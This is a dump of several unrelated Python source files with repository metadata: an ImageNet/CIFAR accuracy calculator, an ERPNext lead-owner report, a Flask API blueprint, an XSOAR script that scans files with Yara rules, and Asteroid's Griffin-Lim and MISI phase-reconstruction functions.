total_data = len(files)
for file in files:
img_ids_name = file.split('_0.')[0]
data_path = os.path.join(result_path, img_ids_name + "_0.bin")
result = np.fromfile(data_path, dtype=np.float32).reshape(batch_size, config.class_num)
for batch in range(batch_size):
predict = np.argsort(-result[batch], axis=-1)
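            # argsort of the negated scores ranks the classes from best to worst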
if labels[img_ids_name+".JPEG"] == predict[0]:
top1 += 1
if labels[img_ids_name+".JPEG"] in predict[:5]:
top5 += 1
print(f"Total data: {total_data}, top1 accuracy: {top1/total_data}, top5 accuracy: {top5/total_data}.")
if __name__ == '__main__':
if args_opt.dataset.lower() == "cifar10" or args_opt.dataset.lower() == "cifar100":
cal_acc_cifar(args_opt.result_path, args_opt.label_path)
else:
cal_acc_imagenet(args_opt.result_path, args_opt.label_path)
| 40.517647 | 107 | 0.680894 |
8134bc20032a9dd817a62a85d41ffcd0df8b8b33
| 752 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/crm/report/lead_owner_efficiency/lead_owner_efficiency.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/crm/report/lead_owner_efficiency/lead_owner_efficiency.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/crm/report/lead_owner_efficiency/lead_owner_efficiency.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from erpnext.crm.report.campaign_efficiency.campaign_efficiency import get_lead_data
def execute(filters=None):
columns, data = [], []
columns=get_columns()
data=get_lead_data(filters, "Lead Owner")
return columns, data
def get_columns():
return [
_("Lead Owner") + ":Data:130",
_("Lead Count") + ":Int:80",
_("Opp Count") + ":Int:80",
_("Quot Count") + ":Int:80",
_("Order Count") + ":Int:100",
_("Order Value") + ":Float:100",
_("Opp/Lead %") + ":Float:100",
_("Quot/Lead %") + ":Float:100",
_("Order/Quot %") + ":Float:100"
]
| 28.923077 | 84 | 0.668883 |
d4c3e9db7049c36d883300456029172d1713deb3
| 399 |
py
|
Python
|
web/controllers/api/__init__.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | 1 |
2020-03-24T04:26:34.000Z
|
2020-03-24T04:26:34.000Z
|
web/controllers/api/__init__.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | null | null | null |
web/controllers/api/__init__.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from flask import Blueprint
route_api = Blueprint('api_page', __name__)
from web.controllers.api.Member import *
from web.controllers.api.Food import *
from web.controllers.api.Order import *
from web.controllers.api.My import *
from web.controllers.api.Cart import *
from web.controllers.api.Address import *
@route_api.route("/")
def index():
return "Mina Api V1.0~~"
| 30.692308 | 44 | 0.741855 |
580517f64b701b2811884caa070d2d05b34578b8
| 7,281 |
py
|
Python
|
Packs/Yara/Scripts/YaraScan/YaraScan.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Yara/Scripts/YaraScan/YaraScan.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Yara/Scripts/YaraScan/YaraScan.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
# The script uses the Python yara library to scan a file or files
''' IMPORTS '''
import yara
''' GLOBAL VARIABLES '''
yaraLogo = "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" # noqa
def main():
entries = list()
args = demisto.args()
entryIDs = argToList(args.get('entryIDs'))
fileInfos = list()
for item in entryIDs:
res = demisto.executeCommand("getFilePath", {"id": item})
if is_error(res):
return_error(get_error(res))
if type(res[0]['Contents']) == dict:
fileInfo = {
"name": res[0]['Contents']['name'],
"id": res[0]['Contents']['ID'],
"path": res[0]['Contents']['path'],
"entryID": item
}
fileInfos.append(fileInfo)
if len(fileInfos) < 1:
return_error('No files were found for scanning, please check the entry IDs')
yaraRuleRaw = args.get('yaraRule')
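    # Editorial note: the rule source is recompiled for every file below;
    # hoisting yara.compile() above the loop would avoid redundant work, at
    # the cost of no longer recording the compile error on each entry.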
for fileInfo in fileInfos:
with open(fileInfo['path'], 'rb') as fp:
thisMatch = {
"Filename": fileInfo['name'],
"entryID": fileInfo['entryID'],
"fileID": fileInfo['id'],
"HasMatch": False,
"HasError": False,
"MatchCount": 0,
"Matches": list(),
"Errors": list()
}
try:
cRule = yara.compile(source=yaraRuleRaw)
except Exception as err:
thisMatch['HasError'] = True
thisMatch['Errors'].append(str(err))
entries.append(thisMatch)
continue
try:
matches = cRule.match(data=fp.read())
except Exception as err:
thisMatch['HasError'] = True
thisMatch['Errors'].append(str(err))
entries.append(thisMatch)
continue
if len(matches) > 0:
thisMatch['HasMatch'] = True
else:
thisMatch['HasMatch'] = False
for match in matches:
matchData = dict()
matchData['RuleName'] = match.rule
matchData['Meta'] = match.meta
matchData['Strings'] = str(match.strings)
matchData['Tags'] = match.tags
matchData['Namespace'] = match.namespace
thisMatch['Matches'].append(matchData)
thisMatch['MatchCount'] += 1
entries.append(thisMatch)
    md = "![yara](data:image/png;base64,{})\n\n{}".format(
        yaraLogo,
        tableToMarkdown('Yara Scan Results:', entries, ['Filename', 'entryID', 'HasMatch', 'HasError', 'MatchCount', 'Matches']))
demisto.results({
'Type': entryTypes['note'],
'Contents': entries,
'ContentsFormat': formats['json'],
'HumanReadable': md,
'ReadableContentsFormat': formats['markdown'],
'EntryContext': {'Yara(val.entryID && val.entryID==obj.entryID)': entries}
})
if __name__ in ['__main__', 'builtin', 'builtins']:
main()
| 78.290323 | 4,185 | 0.778739 |
ed43b1917ff7c88db3c61fe561a0b799eb6154d1
| 7,338 |
py
|
Python
|
asteroid/filterbanks/griffin_lim.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | 1 |
2020-12-18T02:42:23.000Z
|
2020-12-18T02:42:23.000Z
|
asteroid/filterbanks/griffin_lim.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | null | null | null |
asteroid/filterbanks/griffin_lim.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | null | null | null |
import torch
import math
from . import Encoder, Decoder, STFTFB # noqa
from .stft_fb import perfect_synthesis_window
from . import transforms
from ..dsp.consistency import mixture_consistency
def griffin_lim(mag_specgram, stft_enc, angles=None, istft_dec=None, n_iter=6, momentum=0.9):
    """Estimates matching phase from a magnitude spectrogram using the
'fast' Griffin Lim algorithm [1].
Args:
mag_specgram (torch.Tensor): (any, dim, ension, freq, frames) as
returned by `Encoder(STFTFB)`, the magnitude spectrogram to be
inverted.
stft_enc (Encoder[STFTFB]): The `Encoder(STFTFB())` object that was
used to compute the input `mag_spec`.
angles (None or Tensor): Angles to use to initialize the algorithm.
            If None (default), angles are initialized with a uniform distribution.
istft_dec (None or Decoder[STFTFB]): Optional Decoder to use to get
back to the time domain. If None (default), a perfect
reconstruction Decoder is built from `stft_enc`.
n_iter (int): Number of griffin-lim iterations to run.
momentum (float): The momentum of fast Griffin-Lim. Original
Griffin-Lim is obtained for momentum=0.
Returns:
torch.Tensor: estimated waveforms of shape (any, dim, ension, time).
Examples
>>> stft = Encoder(STFTFB(n_filters=256, kernel_size=256, stride=128))
>>> wav = torch.randn(2, 1, 8000)
>>> spec = stft(wav)
>>> masked_spec = spec * torch.sigmoid(torch.randn_like(spec))
>>> mag = transforms.take_mag(masked_spec, -2)
>>> est_wav = griffin_lim(mag, stft, n_iter=32)
References
- [1] Perraudin et al. "A fast Griffin-Lim algorithm," WASPAA 2013.
- [2] D. W. Griffin and J. S. Lim: "Signal estimation from modified
short-time Fourier transform," ASSP 1984.
"""
# We can create perfect iSTFT from STFT Encoder
if istft_dec is None:
# Compute window for perfect resynthesis
syn_win = perfect_synthesis_window(stft_enc.filterbank.window, stft_enc.stride)
istft_dec = Decoder(STFTFB(**stft_enc.get_config(), window=syn_win))
    # If no initial phase is provided, initialize uniformly
if angles is None:
angles = 2 * math.pi * torch.rand_like(mag_specgram, device=mag_specgram.device)
else:
angles = angles.view(*mag_specgram.shape)
# Initialize rebuilt (useful to use momentum)
rebuilt = 0.0
for _ in range(n_iter):
prev_built = rebuilt
# Go to the time domain
complex_specgram = transforms.from_mag_and_phase(mag_specgram, angles)
waveform = istft_dec(complex_specgram)
# And back to TF domain
rebuilt = stft_enc(waveform)
# Update phase estimates (with momentum)
diff = rebuilt - momentum / (1 + momentum) * prev_built
angles = transforms.angle(diff)
final_complex_spec = transforms.from_mag_and_phase(mag_specgram, angles)
return istft_dec(final_complex_spec)
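# --- Usage sketch (not part of the original module) ----------------------
# A minimal, hedged example of phase reconstruction with `griffin_lim`;
# shapes and hyper-parameters below are illustrative, not prescriptive.
# The fast update extrapolates the projection with momentum m:
#     angles_{t+1} = angle(c_t - m / (1 + m) * c_{t-1}),
# so momentum=0 recovers the original Griffin-Lim iteration.
def _griffin_lim_usage_sketch():
    stft = Encoder(STFTFB(n_filters=512, kernel_size=512, stride=256))
    wav = torch.randn(1, 1, 16000)            # dummy mono waveform
    mag = transforms.take_mag(stft(wav), -2)  # magnitude spectrogram
    return griffin_lim(mag, stft, n_iter=32, momentum=0.99)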
def misi(
mixture_wav,
mag_specgrams,
stft_enc,
angles=None,
istft_dec=None,
n_iter=6,
momentum=0.0,
src_weights=None,
dim=1,
):
"""Jointly estimates matching phase from magnitude spectograms using the
Multiple Input Spectrogram Inversion (MISI) algorithm [1].
Args:
mixture_wav (torch.Tensor): (batch, time)
mag_specgrams (torch.Tensor): (batch, n_src, freq, frames) as
returned by `Encoder(STFTFB)`, the magnitude spectrograms to be
jointly inverted using MISI (modified or not).
stft_enc (Encoder[STFTFB]): The `Encoder(STFTFB())` object that was
used to compute the input `mag_spec`.
angles (None or Tensor): Angles to use to initialize the algorithm.
            If None (default), angles are initialized with a uniform distribution.
istft_dec (None or Decoder[STFTFB]): Optional Decoder to use to get
back to the time domain. If None (default), a perfect
reconstruction Decoder is built from `stft_enc`.
n_iter (int): Number of MISI iterations to run.
momentum (float): Momentum on updates (this argument comes from
GriffinLim). Defaults to 0 as it was never proposed anywhere.
src_weights (None or torch.Tensor): Consistency weight for each source.
Shape needs to be broadcastable to `istft_dec(mag_specgrams)`.
We make sure that the weights sum up to 1 along dim `dim`.
If `src_weights` is None, compute them based on relative power.
dim (int): Axis which contains the sources in `mag_specgrams`.
Used for consistency constraint.
Returns:
torch.Tensor: estimated waveforms of shape (batch, n_src, time).
Examples
>>> stft = Encoder(STFTFB(n_filters=256, kernel_size=256, stride=128))
>>> wav = torch.randn(2, 3, 8000)
>>> specs = stft(wav)
>>> masked_specs = specs * torch.sigmoid(torch.randn_like(specs))
>>> mag = transforms.take_mag(masked_specs, -2)
>>> est_wav = misi(wav.sum(1), mag, stft, n_iter=32)
References
[1] Gunawan and Sen, "Iterative Phase Estimation for the Synthesis of
Separated Sources From Single-Channel Mixtures," in IEEE Signal
Processing Letters, 2010.
[2] Wang, LeRoux et al. “End-to-End Speech Separation with Unfolded
Iterative Phase Reconstruction.” Interspeech 2018 (2018)
"""
# We can create perfect iSTFT from STFT Encoder
if istft_dec is None:
# Compute window for perfect resynthesis
syn_win = perfect_synthesis_window(stft_enc.filterbank.window, stft_enc.stride)
istft_dec = Decoder(STFTFB(**stft_enc.get_config(), window=syn_win))
    # If no initial phase is provided, initialize uniformly
if angles is None:
angles = 2 * math.pi * torch.rand_like(mag_specgrams, device=mag_specgrams.device)
# wav_dim is used in mixture_consistency.
# Transform spec src dim to wav src dim for positive and negative dim
wav_dim = dim if dim >= 0 else dim + 1
# We forward/backward the mixture through STFT to have matching shapes
# with the input spectrograms as well as account for potential modulations
# if the window were not chosen to enable perfect reconstruction.
mixture_wav = istft_dec(stft_enc(mixture_wav))
# Initialize rebuilt (useful to use momentum)
rebuilt = 0.0
for _ in range(n_iter):
prev_built = rebuilt
# Go to the time domain
complex_specgram = transforms.from_mag_and_phase(mag_specgrams, angles)
wavs = istft_dec(complex_specgram)
# Make wavs sum up to the mixture
consistent_wavs = mixture_consistency(
mixture_wav, wavs, src_weights=src_weights, dim=wav_dim
)
# Back to TF domain
rebuilt = stft_enc(consistent_wavs)
        # Update phase estimates (with momentum). Momentum is kept as an
        # option: it was shown useful for Griffin-Lim and may help here too.
diff = rebuilt - momentum / (1 + momentum) * prev_built
angles = transforms.angle(diff)
# Final source estimates
final_complex_spec = transforms.from_mag_and_phase(mag_specgrams, angles)
return istft_dec(final_complex_spec)
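# --- Consistency sketch (not part of the original module) ----------------
# The step that distinguishes MISI from per-source Griffin-Lim is the
# projection making the estimates sum back to the mixture. A naive
# equal-weight version of that projection is sketched below; the real
# `mixture_consistency` in asteroid.dsp.consistency also supports
# power-based per-source weights.
def _naive_mixture_consistency(mixture_wav, est_wavs, dim=1):
    # Residual the estimates fail to explain, shape (batch, 1, time).
    residual = mixture_wav.unsqueeze(dim) - est_wavs.sum(dim, keepdim=True)
    # Redistribute it equally over the source estimates.
    return est_wavs + residual / est_wavs.shape[dim]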
| 43.94012 | 93 | 0.670755 |